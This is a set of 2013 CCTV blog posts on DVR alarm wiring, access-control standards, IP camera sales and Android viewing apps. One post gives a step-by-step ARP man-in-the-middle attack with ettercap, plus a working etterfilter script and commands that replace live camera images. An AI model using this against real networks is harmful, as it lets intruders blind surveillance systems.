Wednesday, July 31, 2013

DVR Alarm Output Application

Maximum Time I wrote for Sales/ Marketing / Commercial professional, but this post dedicated to Technical services Technician / Engineers. Many engineers say's How to Connect DVR Alarm output with Power Source/ whats the application etc etc.

A DVR (Digital Video Recorder) alarm output application refers to the use of the alarm output capabilities of a DVR system to trigger external actions or notifications in response to certain events or conditions detected by the DVR. These applications enhance the functionality and usefulness of DVR systems in various security and surveillance scenarios. Here are some common uses of DVR alarm output applications:
  1. Intrusion Detection: When a DVR detects motion or unauthorized entry in a secured area via connected surveillance cameras, it can trigger alarm outputs. These outputs can activate external alarms such as sirens, strobe lights, or even notify security personnel or authorities.

    Door Access Control: Some DVR systems are integrated with access control systems. When someone presents a valid access card or enters a PIN code, the DVR can send a signal to unlock a door or gate, granting access to an authorized individual.

    Smoke and Fire Detection: In situations where a DVR is part of a broader security and safety system, it can be connected to smoke detectors and fire alarms. When smoke or fire is detected, the DVR can trigger alarms, initiate evacuation procedures, and record video footage for investigative purposes.

    Perimeter Protection: For properties with fences or boundaries, outdoor surveillance cameras connected to a DVR can monitor the perimeter. If an intruder breaches the perimeter, the DVR can activate alarms or external lighting to deter the intruder.

    Temperature and Environmental Alerts: In some cases, DVR systems can monitor environmental conditions such as temperature or humidity. If conditions exceed predetermined thresholds (e.g., in server rooms or storage facilities), the DVR can send alerts or trigger alarms to prevent equipment damage.

    Emergency Notifications: DVR alarm outputs can be configured to send notifications to designated individuals or emergency response teams in case of critical events, ensuring a rapid response to security incidents.

    Integration with Other Systems: DVRs often support integration with other security and automation systems, including intrusion detection systems, access control systems, and building management systems. This integration allows for comprehensive security and automation applications.

    Remote Monitoring and Control: Many modern DVR systems allow for remote monitoring and control via mobile apps or web interfaces. Users can receive real-time alerts and take action (e.g., activate alarms or unlock doors) remotely.

    Customized Event Triggers: DVRs often offer programmable event triggers and outputs, allowing users to define specific conditions that lead to alarm activation. This customization caters to the unique security needs of different environments.


  2. Evidence Preservation: When an alarm is triggered, the DVR can automatically start recording video footage and save it to a secure location. This ensures that critical evidence is preserved for investigative and legal purposes.

The alarm output ports on the back of the DVR are each labeled with NO C NC. The NO stands for normally opened, NC means normally closed, and C means common contact. When the alarm is in the non-triggered state, it is normally closed which means that the circuit is allowing current to flow from C to NC. When the alarm is triggered, the relay is enabled and switched from the normally closed (NC) to normally opened (NO) position.

The security application used in these instructions uses a 12v DC powered strobe light. The goal is to turn the strobe light on when an alarm is triggered. For this application, we will use a door contact connected to the alarm input of the DVR to trigger the output. 

Please note that the DC transformer used to power the strobe light / siren is only used to power the siren and has nothing to do with the power supply of the DVR. The concept is that the strobe light sits dormant / un-powered (relay in the NC position) until the alarm goes off. When the alarm goes off, the relay is enabled and allows power to flow to the strobe light (via switching the power of the circuit to the NO position), which turns it on.

WARNING: DVR alarm outputs / relays have a maximum power rating. The alarm outputs of DVRs have a maximum power rating of 2A 120VAC, 2A 24VDC. This rating should accommodate almost all standard burglar alarm equipment, but you should check the specification of each device to be sure. 

If you are using these setup instructions to guide you on integrating alarm devices on other types of surveillance DVRs is strongly recommended that you consult the manual of your DVR to understand the maximum power that your DVR alarm outputs can use. Using an alarm device that draws more power than the relays of your DVR are rated at will cause damage to the relay terminals and / or can ruin the entire DVR.

DVR Alarm Output Wiring

The siren in this example uses a 12v DC power supply. These typically have a single 3.5mm plug on the end of the cable. If your DC transformer has a single plug (instead of separate positive and negative wires), you can use a PT-4 pigtail power lead to convert the plug to separate positive and negative wires.
  1. Connect the positive wire from the power supply to the NO terminal of the alarm-out port.
  2. Connect the negative wire from the power supply to the negative cable of your output device (in this case a strobe light).
  3.  Connect the positive wire from the strobe light to the C terminal of the alarm-out port.

DVR Alarm Output Configuration

In this example, we will use the input from a door sensor to trigger the alarm output (with strobe light connected to it). Please read these setup instructions for details about how the alarm input was configured for the door sensor.
Follows these instructions to configure the door sensor to trigger the alarm output.
1. Access the advanced setup of the DVR the clicking on the Home button, then select Setup > Advanced.

2. On the Advanced menu, click on the the Event tab, then click on the Sensor button.
3. On the sensor screen, you can can choose the action(s) that you want taken. To setup the strobe light on alarm output one to be triggered, click on the gear icon in the alarm section of the sensor action settings. This will open a sub-window that will let you choose to enable all alarm outputs or select the specific ones that you want triggered.
4. Click OK, then OK again to save the settings.
The alarm output of your DVR is now setup. When the door contact is opened, the strobe light will turn on.

It's important to configure and use DVR alarm output applications carefully to prevent false alarms and ensure that they are aligned with the security objectives of the organization or property. Proper integration, testing, and maintenance of the DVR system are essential to its effective operation in various security and surveillance scenarios.

Friday, July 26, 2013

Manipulating IP based CCTV Systems

Manipulating IP based CCTV Systems.
As you are probably aware, CCTV networks provide security to businesses around the world. However due to unsecure networks and poorly designed networks, network security cameras can be abused and there video streams redirected or modified. I am going to explain how this can be done, so you can check your network.

1. Connect to the network using wireless or penetrate a machine on lan.
2. Upload nmap and ettercap onto your machine or the machine on lan that you penetrated.
3. Scan the internal network using nmap and look for open ports in this example we will look for cameras.
4. once you find a camera run ettercap and scan the machines and perform mitm.
5. Watch the traffic and look for the ip of the cameras by sniffing the traffic coming through your machine.
6. Look at the tcp.dst and tcp.src of the packets this will tell you the source and destnation packets.
7. Once you find a suitable camera and the client that is watching create an etterfilter, One is provided below

#Example etterfilter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
replace(“IMG SRC=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
msg(“Filter Ran.\n”);
}

8. Save the file as a filter for example camera.filter
9. Compile that source using ‘etterfilter camera.filter -o camera.ef’
10. Now setup ettercap to use the filter each time the page is viewed across the network ‘ettercap -T -q -F camera.ef -M ARP // //’
11. Now in theory each time the camera is viewed by someone on the network they will see your camera image not the stream.

This attack has been used, and can be devastating to any business that depends on network cameras for security. Some businesses connect network cameras directly to the gateway router, if the gateway is penetrated then this places the cameras at risk.

Wireless networks also can provide attackers with a direct connection to your network once the encryption has been broken. Wireless networks with weak encryption and a lack of network monitoring can aid an attacker in becoming undetected on the network.

I recommend that you install either a hardware firewall that detects spoofing attacks inbetween the network cameras and router/switch, and use network encryption, this should provide a very difficult environment for an attacker.

Sunday, July 14, 2013

Access Control Standards Revolution Now In Progress

Access Control Standards Revolution Now In Progress 



Access control provides the ability to control, monitor and restrict the movement of people, assets or vehicles, in, out and round a building.

Access control is essential for all businesses to protect people and assets and has the added benefit of being expanded from controlling, for example, a single entrance door, to a large integrated security network. There are also huge potentials in terms of integrating other systems, such as Time and Attendance, Visitor Management, ANPR, Fire, Intruder and CCTV.

Few specifications are seen more commonly in access control than UL 294. However, aside from seeing it in print, very few understand what it means. In this note, we break apart and define this spec, describing why it is a vital part of many Access RFPs.


A Standard Defined
The scope of UL 294 covers three aspects of Access Control systems: 
  • Construction (Installation)
  • Performance
  • Operation
Essentially, the heart of UL 294 is a safety standard, where testing proves that system components can be assembled and operate reliably without hazard. In the case of access control, this is a step beyond just validating devices will not catch fire or spark - it attests that the system will not harm the safety or impede egress of those using the system.
In practical terms, this means doors will not accidentally stay locked and keep people in harm's way even during a malfunction. The UL standard subjects each labeled device to a range of testing designed to show the equipment meet relevant code expectations from:
  • NEC (NFPA 99): Requirements that each component will not create a hazard either during (recommended) install or use (Sparking, Grounding)
  • NFPA 72: Fire Code compliance, assures that controllers include interfaces with fire alarm/suppression systems 
  • NFPA 101: System devices 

A UL 294 mark is a 'extra step' the vendor has taken to 'prove' their equipment is safe, and it stands as a 'mark of assurance' when included in buying specifications that dubious equipment will not be purchased.

The Mark

While Underwriter's Laboratories offer a range of 'UL Symbols' that can be interpreted to signify different standards. In the case of UL 294, the mark looks like this:
The UL 'Security Mark' applies only to products such as intrusion detectors, burglar alarms, access control, safes, and vaults.

Performance Tests
UL 294 includes several tests that evaluate how well devices withstand damaging environments. Devices are subjected to atypical electrical, environmental, and brute force situations, including:
  • Variable Voltage
  • Variable Ambients (Environment)
  • Humidity
  • Endurance (Ruggedness)
  • Transients
  • Corrosion
  • Standby Power (Battery backup)
  • Physical Attack Toughness
Tests are performed individually and are not 'layered' or 'stacked' simultaneously as might occur in the field. The exact methodology for each test depends on the device being tested, but the resulting grade is given in four levels of security performance with Level I (lowest level security equipment) to Level IV (highest level security equipment). 

Exclusions
However, not all parts and features of an Access platform fall under the scope of UL 294. Two areas excluded from the scope include:
  • Headend Server/Database: The scope reads "The accuracy of logged data is not evaluated by this standard", and also "This standard does not apply to supplementary computer equipment that is not necessary for operation of the access control system..."
  • Intrusion Detection: Again, the scope details "Where an access control equipment and/or system incorporates the features and functions of a burglar alarm control unit, the requirements of the Standard for Proprietary Burglar Alarm Units and Systems, UL 1076, shall also apply"
This is important to note when careless specs are written that "All Access Equipment shall be UL 294 Certified", because this is inherently not possible. There will be major functional aspects outside the scope of the standard.

Large System Adoption
Especially for larger systems, UL 294 is common, including devices from: Mercury Security, C*Cure, S2, Maxxess, Sargent, etc.
However, certification is done on a component basis, and there may be gaps in a brand's portfolio. If UL 294 compliance is required in a system, every hardware component must be checked for conformity, as there is no 'system' certification.
Systems and platform intended for smaller deployments (<100 doors) typically forego the certification, because it simply is not a purchasing driver for many non-enterprise customers.

Prime Use
Regardless of the 'safety' overtures, like UL certification for surveillance equipment, 294 is primarily used to exclude non-compliant systems from specifications. UL 294 evaluation is not mandatory for Access Equipment, and many vendors forego the cost of certification especially when their offerings are not well suited for larger government, institutional, and hospital verticals where 294 is commonly cited. 
Likewise, while the mark's testing 'proves' that devices are safe, the onus remains on the field technician to install them in the correct fashion to indeed live up to the certification.

Remember once UL certification has void OEM is not responsible for any health & safety incident of your premises. UL certification void due to repairing through unauthorized service provider....etc.

NFPA 101
While NFPA 101 is comprehensive, the most relevant passages for access control include:
  • NFPA 101: 'Electrically Controlled Egress Doors' (2012: 7.2.1.5.6; 2009: 7.2.1.5.5)
  • NFPA 101: 'Releasing Devices' ( 2012: 7.2.1.5.10-12; 2009, 2006, 2003: 7.2.1.5.9 -7.2.1.5.11)
  • NFPA 101: 'Access Controlled Egress Doors' (7.2.1.6.2)
Specifically, requirements like Access Control Request to Exit (RTE), Exit Devices, and Delayed Egress foundationally conform to NFPA 101.

NFPA 72
In general, this code is the foundation of requirements that doors must release when fire alarms or smoke detectors go into alarm.

NFPA 80
Specifically, this code examines Fire Doors and how they are properly used for protection in a building. In many cases, these door types are also slated to become access-controlled openings, and the 'Locks or Latches (6.4.4)' section describes which modifications are permitted for access use without voiding their fire door ratings.

IBC: International Building Code
The IBC, published by the International Code Council, is essentially a guidebook for designing and engineering safe buildings.

If not observed directly as the authority, then whatever resulting codes that do have authority take guidance from the source.
  • ·     IBC: 'Door Operations' (2012, 2009: 1008.1.9; 2006, 2003: 1008.1.8)
  • ·       IBC: 'Sensor Release of Electrically Locked Egress Doors' (2012: 1008.1.9.8; 2009: 1008.1.4.4; 2006, 2003: 1008.1.3.4)
  • ·       IBC: 'Electromagnetically Locked Egress Doors' (2012: 1008.1.9.9; 2009: 1008.1.9.8)

Saturday, June 29, 2013

How To Convince Your Customers To Choose IP Cameras Over Analog



As IP surveillance technology becomes more affordable, it’s also becoming a more attractive solution for smaller installations – installations that used to be the sole domain of analog product. But how do you convince your customers to upgrade their analog to IP, preferably before an incident forces their hand? There are three primary selling points for an IP system of an Analog system – higher resolution, more in-depth analytics, and the ease of new network configuration.

Modern IP cameras generally offer a higher level of resolution than analog cameras. Almost all analog cameras will be limited to the equivalence of a 4CIF or D1 resolution (that is, 704 x 480 or 720 x 480). Many IP cameras boast 5MP resolutions or higher – that’s 15.5 times more pixels than a standard analog camera! And a higher pixel count means more usable surveillance information. This is especially important when it comes to identifying intruders. For positive identification, a general guideline is to have at least 12.7 pixels per inch across the face of a suspect. It’s much better to have that resolution in place during an incident, rather than upgrading to that resolution because the suspect could not be identified with footage from the existing system.

For positive identification, a general guideline is to have at least 12.7 pixels per inch across the face of a suspect.

Another way to utilize this higher resolution as a selling point is the potential lower cost of the total installation. A camera with 5MP mounted 10 feet away from the viewing area will be able to provide identification level resolution across 17 feet horizontally, while a standard analog camera can only cover just over a quarter of this area. This means that you would need four analog cameras to provide the same level of coverage as one 5MP IP camera. When cables, software licenses, mounting hardware, lenses, and all other costs are factored in this can make the IP installation much more appealing from a cost basis.

Another advantage that IP cameras have is the ability to perform increasingly sophisticated analytics onboard the camera itself. Most recorded video is never watched – typically, footage is only reviewed when there is an incident. This is especially true on small installations that do not have a dedicated security guard. With the advent of on-board analytics, IP cameras themselves can now be programmed to independently analyze events, interact with other alarm systems, and send email or text alerts with pictures to interested parties. For example, a camera can be programmed to watch a specific door and only send an alert if that door is opened after regular business hours. At the very least, analytics can make it easier to sift through footage after the fact.
Finally, a lot of customers are concerned that IP video is overly complicated to manage when compared to an analog system. It’s true, earlier versions of IP cameras did require some level of networking know-how. But newer cameras are getting extremely close to plug-and-play with features that automatically detect and configure cameras added to a network through tools such as DDNS, DHCP, and other networking protocols. Depending on the brand selected, all that could be involved in the installation of a new device is plugging the camera into the switch and then selecting “Detect New Hardware” in the accompanying software. Network cameras can also run on existing network infrastructure and only one cable is required for both data and power with Power over Ethernet technology.

As every device begins to merge onto the network, it makes sense that security cameras move there as well. An IP video installation may cost more than a conventional analog system, but the price difference is getting smaller – and the benefits are increasing.

Wednesday, June 26, 2013

Android IP Camera Android Apps

Android IP Camera Android Apps
As a well-known eSecurity Professional in India I got many appreciation call/mail for my Blog writing. Thanks to all of you for read and understand my wrong English writing on my blog. Recently I visit Bhubaneswar (Located in India, Capital of Orissa) and face some question, customer ask you people highlight our NVR/ DVR is support Remote viewing on Android enable phone, but we are not enjoy the benefits of mobile security camera monitoring through our android phone. Our System Integrator / Installer technical person come and say something that we are not understands. So you’ve come to the right place. Many of today’s most trusted manufacturers of IP security cameras, DVR, NVRs, and video management software offer Android IP camera apps for safe and reliable monitoring. I share with you a list of Android security camera apps offered by manufacturers, and the high-end features available on each.

Optica
Android Security Camera App Name: OpticaMobile
Optica, a leading manufacturer of high-definition IP cameras, offers OpticaMobile and OpticaMobile HD mobile apps designed for iPhone, iPad, and Android devices. OpticaMobile delivers a wide spectrum of features to improve the viewing experience for all Optica IP cameras, including quad-view mode, live video streams, bookmarking, audio, snapshots, dual stream support, and PTZ control of Optica’s P218Z speed dome. It’s an easy and convenient way to tap into your Optica IP camera system while on the go. OpticaMobile HD is built for use on the iPad, while OpticaMobile is compatible with iPhone and Android devices.

Milestone
Android IP Camera App Name: XProtect Mobile
Created by Milestone, one of world’s leading developers of video management software, the XProtect Mobile Android security app offers a bevy of features catered to on-the-go surveillance users. With an average rating of 4.6, with 5 being the highest score, users have raved about its built-in features and usability. What’s great about this video surveillance app is how many cameras you’re able to view and manage at once. Users were most excited about the number of cameras they can monitor on this app – one even wrote that the app was able to support all 38 of the user’s IP cameras. Key features include video push, control of inputs and outputs, control of PTZ cameras, viewing live video feed from numerous remote security cameras, snapshot sharing to send via email or MMS, and compatibility with WiFi, 3G, and 4G networks.

Smartvue
Android IP Camera App Name: Smartvue Android App
Smartvue has remained on the cutting-edge of NVR technology since its inception. Recognized as an innovator in this market, Smartvue offers complimentary remote video surveillance access to its NVRs so you can check your IP cameras while on-the-go. Designed for Android versions 2.2 and up, the Smartvue Android App gives you complete access to your IP camera system when you’re physically off-site. With the Smartvue Android App installed, you can view your live video feed, playback archived recordings, swipe the screen to change cameras, control display settings as needed, monitor multiple cameras at once, and control PTZ functions. It also works with a wide variety of IP camera brands and body styles. Users have given this video surveillance app excellent ratings for its convenience, ease-of-use, and intuitively designed interface.

VivoTek
Android IP Camera App Name: iViewer LITE
This Android IP camera viewer app offered by Vivotek enables surveillance users to monitor live streaming video from all of their IP cameras, or those that are managed by Vivotek’s video management software for up to 360 seconds at a time. Note that this app currently works only with Android V2.3 and higher. Supporting IP cameras from a multitude of server connections, this app allows PTZ control via the touch screen, real-time video switching for different display options, image snapshots, single-channel playback by search, and the ability to playback recorded video for 1, 2, 5, and 10 minute intervals Additionally, you can configure your app to support fisheye camera views.

QNAP
Android IP Camera App Name: VMobile
Offered by NVR manufacturer QNAP, the VMobile Android App facilitates remote and wireless monitoring of IP cameras by connecting to the company’s VioStar NVR through Android versions v1.6, v2.1, and v2.2. VMobile is able to manage an unlimited number of servers and cameras for a wide variety of IP camera brands and body styles. With this app, you’re able to adjust the display mode, control PTZ, receive notifications if your IP camera detects tampering or vandalism, and capture snapshots that you want to save. You’re also able to playback recorded video from each of your IP cameras and search recorded video based on date and time.

EverFocus
Android IP Camera App Name: MobileFocus & MobileFocusPlus
Through the MobileFocus Android security camera app, you can connect to Everfocus DVRs and IP cameras at the touch of a button. Everfocus is one of the leading manufacturers of CCTV cameras, DVRs, and professional security products, including a select line of IP cameras catered to the ever-growing IP surveillance market. The mobile monitoring app’s easiest functions are viewing your cameras in real-time and controlling PTZ remote security camera models. Auxiliary mobile monitoring technologies include device management, channel control, gesture digital zoom, image snapshots, and full screen mode.